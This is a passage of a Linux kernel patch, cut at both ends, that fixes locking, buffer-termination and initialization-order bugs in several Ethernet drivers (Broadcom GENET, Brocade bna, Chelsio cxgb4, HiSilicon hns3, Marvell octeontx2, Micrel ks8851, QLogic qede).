+@@ -2491,8 +2495,10 @@ static void reset_umac(struct bcmgenet_priv *priv)
+ 	udelay(10);
+ 
+ 	/* issue soft reset and disable MAC while updating its registers */
++	spin_lock_bh(&priv->reg_lock);
+ 	bcmgenet_umac_writel(priv, CMD_SW_RESET, UMAC_CMD);
+ 	udelay(2);
++	spin_unlock_bh(&priv->reg_lock);
+ }
+ 
+ static void bcmgenet_intr_disable(struct bcmgenet_priv *priv)
+@@ -3298,7 +3304,7 @@ static void bcmgenet_get_hw_addr(struct bcmgenet_priv *priv,
+ }
+ 
+ /* Returns a reusable dma control register value */
+-static u32 bcmgenet_dma_disable(struct bcmgenet_priv *priv)
++static u32 bcmgenet_dma_disable(struct bcmgenet_priv *priv, bool flush_rx)
+ {
+ 	unsigned int i;
+ 	u32 reg;
+@@ -3323,6 +3329,14 @@ static u32 bcmgenet_dma_disable(struct bcmgenet_priv *priv)
+ 	udelay(10);
+ 	bcmgenet_umac_writel(priv, 0, UMAC_TX_FLUSH);
+ 
++	if (flush_rx) {
++		reg = bcmgenet_rbuf_ctrl_get(priv);
++		bcmgenet_rbuf_ctrl_set(priv, reg | BIT(0));
++		udelay(10);
++		bcmgenet_rbuf_ctrl_set(priv, reg);
++		udelay(10);
++	}
++
+ 	return dma_ctrl;
+ }
+ 
+@@ -3344,7 +3358,9 @@ static void bcmgenet_netif_start(struct net_device *dev)
+ 	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 
+ 	/* Start the network engine */
++	netif_addr_lock_bh(dev);
+ 	bcmgenet_set_rx_mode(dev);
++	netif_addr_unlock_bh(dev);
+ 	bcmgenet_enable_rx_napi(priv);
+ 
+ 	umac_enable_set(priv, CMD_TX_EN | CMD_RX_EN, true);
+@@ -3386,8 +3402,8 @@ static int bcmgenet_open(struct net_device *dev)
+ 
+ 	bcmgenet_set_hw_addr(priv, dev->dev_addr);
+ 
+-	/* Disable RX/TX DMA and flush TX queues */
+-	dma_ctrl = bcmgenet_dma_disable(priv);
++	/* Disable RX/TX DMA and flush TX and RX queues */
++	dma_ctrl = bcmgenet_dma_disable(priv, true);
+ 
+ 	/* Reinitialize TDMA and RDMA and SW housekeeping */
+ 	ret = bcmgenet_init_dma(priv);
+@@ -3605,16 +3621,19 @@ static void bcmgenet_set_rx_mode(struct net_device *dev)
+ 	 * 3. The number of filters needed exceeds the number filters
+ 	 *    supported by the hardware.
+ 	*/
++	spin_lock(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	if ((dev->flags & (IFF_PROMISC | IFF_ALLMULTI)) ||
+ 	    (nfilter > MAX_MDF_FILTER)) {
+ 		reg |= CMD_PROMISC;
+ 		bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++		spin_unlock(&priv->reg_lock);
+ 		bcmgenet_umac_writel(priv, 0, UMAC_MDF_CTRL);
+ 		return;
+ 	} else {
+ 		reg &= ~CMD_PROMISC;
+ 		bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++		spin_unlock(&priv->reg_lock);
+ 	}
+ 
+ 	/* update MDF filter */
+@@ -4016,6 +4035,7 @@ static int bcmgenet_probe(struct platform_device *pdev)
+ 		goto err;
+ 	}
+ 
++	spin_lock_init(&priv->reg_lock);
+ 	spin_lock_init(&priv->lock);
+ 
+ 	/* Set default pause parameters */
+@@ -4258,7 +4278,7 @@ static int bcmgenet_resume(struct device *d)
+ 			bcmgenet_hfb_create_rxnfc_filter(priv, rule);
+ 
+ 	/* Disable RX/TX DMA and flush TX queues */
+-	dma_ctrl = bcmgenet_dma_disable(priv);
++	dma_ctrl = bcmgenet_dma_disable(priv, false);
+ 
+ 	/* Reinitialize TDMA and RDMA and SW housekeeping */
+ 	ret = bcmgenet_init_dma(priv);
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.h b/drivers/net/ethernet/broadcom/genet/bcmgenet.h
+index 1985c0ec4da2a..28e2c94ef835c 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.h
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.h
+@@ -1,6 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
+- * Copyright (c) 2014-2020 Broadcom
++ * Copyright (c) 2014-2024 Broadcom
+  */
+ 
+ #ifndef __BCMGENET_H__
+@@ -573,6 +573,8 @@ struct bcmgenet_rxnfc_rule {
+ /* device context */
+ struct bcmgenet_priv {
+ 	void __iomem *base;
++	/* reg_lock: lock to serialize access to shared registers */
++	spinlock_t reg_lock;
+ 	enum bcmgenet_version version;
+ 	struct net_device *dev;
+ 
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet_wol.c b/drivers/net/ethernet/broadcom/genet/bcmgenet_wol.c
+index f55d9d9c01a85..56781e7214978 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet_wol.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet_wol.c
+@@ -2,7 +2,7 @@
+ /*
+  * Broadcom GENET (Gigabit Ethernet) Wake-on-LAN support
+  *
+- * Copyright (c) 2014-2020 Broadcom
++ * Copyright (c) 2014-2024 Broadcom
+  */
+ 
+ #define pr_fmt(fmt)				"bcmgenet_wol: " fmt
+@@ -133,6 +133,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ 	}
+ 
+ 	/* Can't suspend with WoL if MAC is still in reset */
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	if (reg & CMD_SW_RESET)
+ 		reg &= ~CMD_SW_RESET;
+@@ -140,6 +141,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ 	/* disable RX */
+ 	reg &= ~CMD_RX_EN;
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ 	mdelay(10);
+ 
+ 	if (priv->wolopts & (WAKE_MAGIC | WAKE_MAGICSECURE)) {
+@@ -185,6 +187,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ 	}
+ 
+ 	/* Enable CRC forward */
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	priv->crc_fwd_en = 1;
+ 	reg |= CMD_CRC_FWD;
+@@ -192,6 +195,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ 	/* Receiver must be enabled for WOL MP detection */
+ 	reg |= CMD_RX_EN;
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ 
+ 	reg = UMAC_IRQ_MPD_R;
+ 	if (hfb_enable)
+@@ -238,7 +242,9 @@ void bcmgenet_wol_power_up_cfg(struct bcmgenet_priv *priv,
+ 	}
+ 
+ 	/* Disable CRC Forward */
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	reg &= ~CMD_CRC_FWD;
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ }
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index 1779ee524dac7..f21f2aaa6fd91 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -2,7 +2,7 @@
+ /*
+  * Broadcom GENET MDIO routines
+  *
+- * Copyright (c) 2014-2017 Broadcom
++ * Copyright (c) 2014-2024 Broadcom
+  */
+ 
+ #include <linux/acpi.h>
+@@ -72,10 +72,10 @@ static void bcmgenet_mac_config(struct net_device *dev)
+ 	 * Receive clock is provided by the PHY.
+ 	 */
+ 	reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL);
+-	reg &= ~OOB_DISABLE;
+ 	reg |= RGMII_LINK;
+ 	bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL);
+ 
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	reg &= ~((CMD_SPEED_MASK << CMD_SPEED_SHIFT) |
+ 		       CMD_HD_EN |
+@@ -88,6 +88,7 @@ static void bcmgenet_mac_config(struct net_device *dev)
+ 		reg |= CMD_TX_EN | CMD_RX_EN;
+ 	}
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ 
+ 	priv->eee.eee_active = phy_init_eee(phydev, 0) >= 0;
+ 	bcmgenet_eee_enable_set(dev,
+@@ -100,10 +101,18 @@ static void bcmgenet_mac_config(struct net_device *dev)
+  */
+ void bcmgenet_mii_setup(struct net_device *dev)
+ {
++	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 	struct phy_device *phydev = dev->phydev;
++	u32 reg;
+ 
+-	if (phydev->link)
++	if (phydev->link) {
+ 		bcmgenet_mac_config(dev);
++	} else {
++		reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL);
++		reg &= ~RGMII_LINK;
++		bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL);
++	}
++
+ 	phy_print_status(phydev);
+ }
+ 
+@@ -264,18 +273,22 @@ int bcmgenet_mii_config(struct net_device *dev, bool init)
+ 			(priv->phy_interface != PHY_INTERFACE_MODE_MOCA);
+ 
+ 	/* This is an external PHY (xMII), so we need to enable the RGMII
+-	 * block for the interface to work
++	 * block for the interface to work, unconditionally clear the
++	 * Out-of-band disable since we do not need it.
+ 	 */
++	mutex_lock(&phydev->lock);
++	reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL);
++	reg &= ~OOB_DISABLE;
+ 	if (priv->ext_phy) {
+-		reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL);
+ 		reg &= ~ID_MODE_DIS;
+ 		reg |= id_mode_dis;
+ 		if (GENET_IS_V1(priv) || GENET_IS_V2(priv) || GENET_IS_V3(priv))
+ 			reg |= RGMII_MODE_EN_V123;
+ 		else
+ 			reg |= RGMII_MODE_EN;
+-		bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL);
+ 	}
++	bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL);
++	mutex_unlock(&phydev->lock);
+ 
+ 	if (init)
+ 		dev_info(kdev, "configuring instance for %s\n", phy_name);
+diff --git a/drivers/net/ethernet/brocade/bna/bnad_debugfs.c b/drivers/net/ethernet/brocade/bna/bnad_debugfs.c
+index 04ad0f2b9677e..777f0d7e48192 100644
+--- a/drivers/net/ethernet/brocade/bna/bnad_debugfs.c
++++ b/drivers/net/ethernet/brocade/bna/bnad_debugfs.c
+@@ -312,7 +312,7 @@ bnad_debugfs_write_regrd(struct file *file, const char __user *buf,
+ 	void *kern_buf;
+ 
+ 	/* Copy the user space buf */
+-	kern_buf = memdup_user(buf, nbytes);
++	kern_buf = memdup_user_nul(buf, nbytes);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
+@@ -372,7 +372,7 @@ bnad_debugfs_write_regwr(struct file *file, const char __user *buf,
+ 	void *kern_buf;
+ 
+ 	/* Copy the user space buf */
+-	kern_buf = memdup_user(buf, nbytes);
++	kern_buf = memdup_user_nul(buf, nbytes);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
+diff --git a/drivers/net/ethernet/chelsio/cxgb4/sge.c b/drivers/net/ethernet/chelsio/cxgb4/sge.c
+index 46809e2d94ee0..4809d9eae6ca5 100644
+--- a/drivers/net/ethernet/chelsio/cxgb4/sge.c
++++ b/drivers/net/ethernet/chelsio/cxgb4/sge.c
+@@ -2684,12 +2684,12 @@ int cxgb4_selftest_lb_pkt(struct net_device *netdev)
+ 	lb->loopback = 1;
+ 
+ 	q = &adap->sge.ethtxq[pi->first_qset];
+-	__netif_tx_lock(q->txq, smp_processor_id());
++	__netif_tx_lock_bh(q->txq);
+ 
+ 	reclaim_completed_tx(adap, &q->q, -1, true);
+ 	credits = txq_avail(&q->q) - ndesc;
+ 	if (unlikely(credits < 0)) {
+-		__netif_tx_unlock(q->txq);
++		__netif_tx_unlock_bh(q->txq);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -2724,7 +2724,7 @@ int cxgb4_selftest_lb_pkt(struct net_device *netdev)
+ 	init_completion(&lb->completion);
+ 	txq_advance(&q->q, ndesc);
+ 	cxgb4_ring_tx_db(adap, &q->q, ndesc);
+-	__netif_tx_unlock(q->txq);
++	__netif_tx_unlock_bh(q->txq);
+ 
+ 	/* wait for the pkt to return */
+ 	ret = wait_for_completion_timeout(&lb->completion, 10 * HZ);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hnae3.h b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+index c693bb701ba3e..60b8d61af07f9 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hnae3.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+@@ -873,7 +873,7 @@ struct hnae3_handle {
+ 		struct hnae3_roce_private_info rinfo;
+ 	};
+ 
+-	u32 numa_node_mask;	/* for multi-chip support */
++	nodemask_t numa_node_mask; /* for multi-chip support */
+ 
+ 	enum hnae3_port_base_vlan_state port_base_vlan_state;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 9db363fbc34fd..a2655adc764cd 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -1624,6 +1624,9 @@ static int hclge_configure(struct hclge_dev *hdev)
+ 			cfg.default_speed, ret);
+ 		return ret;
+ 	}
++	hdev->hw.mac.req_speed = hdev->hw.mac.speed;
++	hdev->hw.mac.req_autoneg = AUTONEG_ENABLE;
++	hdev->hw.mac.req_duplex = DUPLEX_FULL;
+ 
+ 	hclge_parse_link_mode(hdev, cfg.speed_ability);
+ 
+@@ -1853,7 +1856,8 @@ static int hclge_vport_setup(struct hclge_vport *vport, u16 num_tqps)
+ 
+ 	nic->pdev = hdev->pdev;
+ 	nic->ae_algo = &ae_algo;
+-	nic->numa_node_mask = hdev->numa_node_mask;
++	bitmap_copy(nic->numa_node_mask.bits, hdev->numa_node_mask.bits,
++		    MAX_NUMNODES);
+ 	nic->kinfo.io_base = hdev->hw.hw.io_base;
+ 
+ 	ret = hclge_knic_setup(vport, num_tqps,
+@@ -2545,7 +2549,8 @@ static int hclge_init_roce_base_info(struct hclge_vport *vport)
+ 
+ 	roce->pdev = nic->pdev;
+ 	roce->ae_algo = nic->ae_algo;
+-	roce->numa_node_mask = nic->numa_node_mask;
++	bitmap_copy(roce->numa_node_mask.bits, nic->numa_node_mask.bits,
++		    MAX_NUMNODES);
+ 
+ 	return 0;
+ }
+@@ -3429,9 +3434,9 @@ hclge_set_phy_link_ksettings(struct hnae3_handle *handle,
+ 		return ret;
+ 	}
+ 
+-	hdev->hw.mac.autoneg = cmd->base.autoneg;
+-	hdev->hw.mac.speed = cmd->base.speed;
+-	hdev->hw.mac.duplex = cmd->base.duplex;
++	hdev->hw.mac.req_autoneg = cmd->base.autoneg;
++	hdev->hw.mac.req_speed = cmd->base.speed;
++	hdev->hw.mac.req_duplex = cmd->base.duplex;
+ 	linkmode_copy(hdev->hw.mac.advertising, cmd->link_modes.advertising);
+ 
+ 	return 0;
+@@ -3464,9 +3469,9 @@ static int hclge_tp_port_init(struct hclge_dev *hdev)
+ 	if (!hnae3_dev_phy_imp_supported(hdev))
+ 		return 0;
+ 
+-	cmd.base.autoneg = hdev->hw.mac.autoneg;
+-	cmd.base.speed = hdev->hw.mac.speed;
+-	cmd.base.duplex = hdev->hw.mac.duplex;
++	cmd.base.autoneg = hdev->hw.mac.req_autoneg;
++	cmd.base.speed = hdev->hw.mac.req_speed;
++	cmd.base.duplex = hdev->hw.mac.req_duplex;
+ 	linkmode_copy(cmd.link_modes.advertising, hdev->hw.mac.advertising);
+ 
+ 	return hclge_set_phy_link_ksettings(&hdev->vport->nic, &cmd);
+@@ -8046,8 +8051,7 @@ static void hclge_set_timer_task(struct hnae3_handle *handle, bool enable)
+ 		/* Set the DOWN flag here to disable link updating */
+ 		set_bit(HCLGE_STATE_DOWN, &hdev->state);
+ 
+-		/* flush memory to make sure DOWN is seen by service task */
+-		smp_mb__before_atomic();
++		smp_mb__after_atomic(); /* flush memory to make sure DOWN is seen by service task */
+ 		hclge_flush_link_update(hdev);
+ 	}
+ }
+@@ -10000,6 +10004,7 @@ static int hclge_set_vlan_protocol_type(struct hclge_dev *hdev)
+ static int hclge_init_vlan_filter(struct hclge_dev *hdev)
+ {
+ 	struct hclge_vport *vport;
++	bool enable = true;
+ 	int ret;
+ 	int i;
+ 
+@@ -10019,8 +10024,12 @@ static int hclge_init_vlan_filter(struct hclge_dev *hdev)
+ 		vport->cur_vlan_fltr_en = true;
+ 	}
+ 
++	if (test_bit(HNAE3_DEV_SUPPORT_VLAN_FLTR_MDF_B, hdev->ae_dev->caps) &&
++	    !test_bit(HNAE3_DEV_SUPPORT_PORT_VLAN_BYPASS_B, hdev->ae_dev->caps))
++		enable = false;
++
+ 	return hclge_set_vlan_filter_ctrl(hdev, HCLGE_FILTER_TYPE_PORT,
+-					  HCLGE_FILTER_FE_INGRESS, true, 0);
++					  HCLGE_FILTER_FE_INGRESS, enable, 0);
+ }
+ 
+ static int hclge_init_vlan_type(struct hclge_dev *hdev)
+@@ -11600,16 +11609,10 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 	if (ret)
+ 		goto out;
+ 
+-	ret = hclge_devlink_init(hdev);
+-	if (ret)
+-		goto err_pci_uninit;
+-
+-	devl_lock(hdev->devlink);
+-
+ 	/* Firmware command queue initialize */
+ 	ret = hclge_comm_cmd_queue_init(hdev->pdev, &hdev->hw.hw);
+ 	if (ret)
+-		goto err_devlink_uninit;
++		goto err_pci_uninit;
+ 
+ 	/* Firmware command initialize */
+ 	ret = hclge_comm_cmd_init(hdev->ae_dev, &hdev->hw.hw, &hdev->fw_version,
+@@ -11737,7 +11740,7 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 
+ 	ret = hclge_update_port_info(hdev);
+ 	if (ret)
+-		goto err_mdiobus_unreg;
++		goto err_ptp_uninit;
+ 
+ 	INIT_KFIFO(hdev->mac_tnl_log);
+ 
+@@ -11772,6 +11775,10 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 	/* Enable MISC vector(vector0) */
+ 	hclge_enable_vector(&hdev->misc_vector, true);
+ 
++	ret = hclge_devlink_init(hdev);
++	if (ret)
++		goto err_ptp_uninit;
++
+ 	hclge_state_init(hdev);
+ 	hdev->last_reset_time = jiffies;
+ 
+@@ -11779,10 +11786,10 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 		 HCLGE_DRIVER_NAME);
+ 
+ 	hclge_task_schedule(hdev, round_jiffies_relative(HZ));
+-
+-	devl_unlock(hdev->devlink);
+ 	return 0;
+ 
++err_ptp_uninit:
++	hclge_ptp_uninit(hdev);
+ err_mdiobus_unreg:
+ 	if (hdev->hw.mac.phydev)
+ 		mdiobus_unregister(hdev->hw.mac.mdio_bus);
+@@ -11792,9 +11799,6 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 	pci_free_irq_vectors(pdev);
+ err_cmd_uninit:
+ 	hclge_comm_cmd_uninit(hdev->ae_dev, &hdev->hw.hw);
+-err_devlink_uninit:
+-	devl_unlock(hdev->devlink);
+-	hclge_devlink_uninit(hdev);
+ err_pci_uninit:
+ 	pcim_iounmap(pdev, hdev->hw.hw.io_base);
+ 	pci_clear_master(pdev);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+index f6fef790e16c1..fd79bb81b6e07 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+@@ -256,11 +256,14 @@ struct hclge_mac {
+ 	u8 media_type;	/* port media type, e.g. fibre/copper/backplane */
+ 	u8 mac_addr[ETH_ALEN];
+ 	u8 autoneg;
++	u8 req_autoneg;
+ 	u8 duplex;
++	u8 req_duplex;
+ 	u8 support_autoneg;
+ 	u8 speed_type;	/* 0: sfp speed, 1: active speed */
+ 	u8 lane_num;
+ 	u32 speed;
++	u32 req_speed;
+ 	u32 max_speed;
+ 	u32 speed_ability; /* speed ability supported by current media */
+ 	u32 module_type; /* sub media type, e.g. kr/cr/sr/lr */
+@@ -872,7 +875,7 @@ struct hclge_dev {
+ 
+ 	u16 fdir_pf_filter_count; /* Num of guaranteed filters for this PF */
+ 	u16 num_alloc_vport;		/* Num vports this driver supports */
+-	u32 numa_node_mask;
++	nodemask_t numa_node_mask;
+ 	u16 rx_buf_len;
+ 	u16 num_tx_desc;		/* desc num of per tx queue */
+ 	u16 num_rx_desc;		/* desc num of per rx queue */
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+index 04ff9bf121853..877feee53804f 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+@@ -1077,12 +1077,13 @@ static void hclge_mbx_request_handling(struct hclge_mbx_ops_param *param)
+ 
+ 	hdev = param->vport->back;
+ 	cmd_func = hclge_mbx_ops_list[param->req->msg.code];
+-	if (cmd_func)
+-		ret = cmd_func(param);
+-	else
++	if (!cmd_func) {
+ 		dev_err(&hdev->pdev->dev,
+ 			"un-supported mailbox message, code = %u\n",
+ 			param->req->msg.code);
++		return;
++	}
++	ret = cmd_func(param);
+ 
+ 	/* PF driver should not reply IMP */
+ 	if (hnae3_get_bit(param->req->mbx_need_resp, HCLGE_MBX_NEED_RESP_B) &&
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index 5a978ea101a90..1f5a27fb309aa 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -464,7 +464,8 @@ static int hclgevf_set_handle_info(struct hclgevf_dev *hdev)
+ 
+ 	nic->ae_algo = &ae_algovf;
+ 	nic->pdev = hdev->pdev;
+-	nic->numa_node_mask = hdev->numa_node_mask;
++	bitmap_copy(nic->numa_node_mask.bits, hdev->numa_node_mask.bits,
++		    MAX_NUMNODES);
+ 	nic->flags |= HNAE3_SUPPORT_VF;
+ 	nic->kinfo.io_base = hdev->hw.hw.io_base;
+ 
+@@ -2136,8 +2137,8 @@ static int hclgevf_init_roce_base_info(struct hclgevf_dev *hdev)
+ 
+ 	roce->pdev = nic->pdev;
+ 	roce->ae_algo = nic->ae_algo;
+-	roce->numa_node_mask = nic->numa_node_mask;
+-
++	bitmap_copy(roce->numa_node_mask.bits, nic->numa_node_mask.bits,
++		    MAX_NUMNODES);
+ 	return 0;
+ }
+ 
+@@ -2235,8 +2236,7 @@ static void hclgevf_set_timer_task(struct hnae3_handle *handle, bool enable)
+ 	} else {
+ 		set_bit(HCLGEVF_STATE_DOWN, &hdev->state);
+ 
+-		/* flush memory to make sure DOWN is seen by service task */
+-		smp_mb__before_atomic();
++		smp_mb__after_atomic(); /* flush memory to make sure DOWN is seen by service task */
+ 		hclgevf_flush_link_update(hdev);
+ 	}
+ }
+@@ -2902,10 +2902,6 @@ static int hclgevf_init_hdev(struct hclgevf_dev *hdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = hclgevf_devlink_init(hdev);
+-	if (ret)
+-		goto err_devlink_init;
+-
+ 	ret = hclge_comm_cmd_queue_init(hdev->pdev, &hdev->hw.hw);
+ 	if (ret)
+ 		goto err_cmd_queue_init;
+@@ -2998,6 +2994,10 @@ static int hclgevf_init_hdev(struct hclgevf_dev *hdev)
+ 
+ 	hclgevf_init_rxd_adv_layout(hdev);
+ 
++	ret = hclgevf_devlink_init(hdev);
++	if (ret)
++		goto err_config;
++
+ 	set_bit(HCLGEVF_STATE_SERVICE_INITED, &hdev->state);
+ 
+ 	hdev->last_reset_time = jiffies;
+@@ -3017,8 +3017,6 @@ static int hclgevf_init_hdev(struct hclgevf_dev *hdev)
+ err_cmd_init:
+ 	hclge_comm_cmd_uninit(hdev->ae_dev, &hdev->hw.hw);
+ err_cmd_queue_init:
+-	hclgevf_devlink_uninit(hdev);
+-err_devlink_init:
+ 	hclgevf_pci_uninit(hdev);
+ 	clear_bit(HCLGEVF_STATE_IRQ_INITED, &hdev->state);
+ 	return ret;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
+index d65ace07b4569..976414d00e67a 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
+@@ -236,7 +236,7 @@ struct hclgevf_dev {
+ 	u16 rss_size_max;	/* HW defined max RSS task queue */
+ 
+ 	u16 num_alloc_vport;	/* num vports this driver supports */
+-	u32 numa_node_mask;
++	nodemask_t numa_node_mask;
+ 	u16 rx_buf_len;
+ 	u16 num_tx_desc;	/* desc num of per tx queue */
+ 	u16 num_rx_desc;	/* desc num of per rx queue */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index cc5d342e026c7..a3c1d82032f55 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -999,12 +999,10 @@ static ssize_t rvu_dbg_qsize_write(struct file *filp,
+ 	u16 pcifunc;
+ 	int ret, lf;
+ 
+-	cmd_buf = memdup_user(buffer, count + 1);
++	cmd_buf = memdup_user_nul(buffer, count);
+ 	if (IS_ERR(cmd_buf))
+ 		return -ENOMEM;
+ 
+-	cmd_buf[count] = '\0';
+-
+ 	cmd_buf_tmp = strchr(cmd_buf, '\n');
+ 	if (cmd_buf_tmp) {
+ 		*cmd_buf_tmp = '\0';
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index d4cdf3d4f5525..502518cdb4618 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
+@@ -234,12 +234,13 @@ static void ks8851_dbg_dumpkkt(struct ks8851_net *ks, u8 *rxpkt)
+ /**
+  * ks8851_rx_pkts - receive packets from the host
+  * @ks: The device information.
++ * @rxq: Queue of packets received in this function.
+  *
+  * This is called from the IRQ work queue when the system detects that there
+  * are packets in the receive queue. Find out how many packets there are and
+  * read them from the FIFO.
+  */
+-static void ks8851_rx_pkts(struct ks8851_net *ks)
++static void ks8851_rx_pkts(struct ks8851_net *ks, struct sk_buff_head *rxq)
+ {
+ 	struct sk_buff *skb;
+ 	unsigned rxfc;
+@@ -299,7 +300,7 @@ static void ks8851_rx_pkts(struct ks8851_net *ks)
+ 					ks8851_dbg_dumpkkt(ks, rxpkt);
+ 
+ 				skb->protocol = eth_type_trans(skb, ks->netdev);
+-				__netif_rx(skb);
++				__skb_queue_tail(rxq, skb);
+ 
+ 				ks->netdev->stats.rx_packets++;
+ 				ks->netdev->stats.rx_bytes += rxlen;
+@@ -326,11 +327,11 @@ static void ks8851_rx_pkts(struct ks8851_net *ks)
+ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ {
+ 	struct ks8851_net *ks = _ks;
++	struct sk_buff_head rxq;
+ 	unsigned handled = 0;
+ 	unsigned long flags;
+ 	unsigned int status;
+-
+-	local_bh_disable();
++	struct sk_buff *skb;
+ 
+ 	ks8851_lock(ks, &flags);
+ 
+@@ -384,7 +385,8 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 		 * from the device so do not bother masking just the RX
+ 		 * from the device. */
+ 
+-		ks8851_rx_pkts(ks);
++		__skb_queue_head_init(&rxq);
++		ks8851_rx_pkts(ks, &rxq);
+ 	}
+ 
+ 	/* if something stopped the rx process, probably due to wanting
+@@ -408,7 +410,9 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	if (status & IRQ_LCI)
+ 		mii_check_link(&ks->mii);
+ 
+-	local_bh_enable();
++	if (status & IRQ_RXI)
++		while ((skb = __skb_dequeue(&rxq)))
++			netif_rx(skb);
+ 
+ 	return IRQ_HANDLED;
+ }
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_filter.c b/drivers/net/ethernet/qlogic/qede/qede_filter.c
+index 3010833ddde33..8871099b99d8a 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_filter.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_filter.c
+@@ -1868,8 +1868,8 @@ int qede_add_tc_flower_fltr(struct qede_dev *edev, __be16 proto,
+ 			    struct flow_cls_offload *f)
+ {
+ 	struct qede_arfs_fltr_node *n;
+-	int min_hlen, rc = -EINVAL;
+ 	struct qede_arfs_tuple t;
++	int min_hlen, rc;
+ 
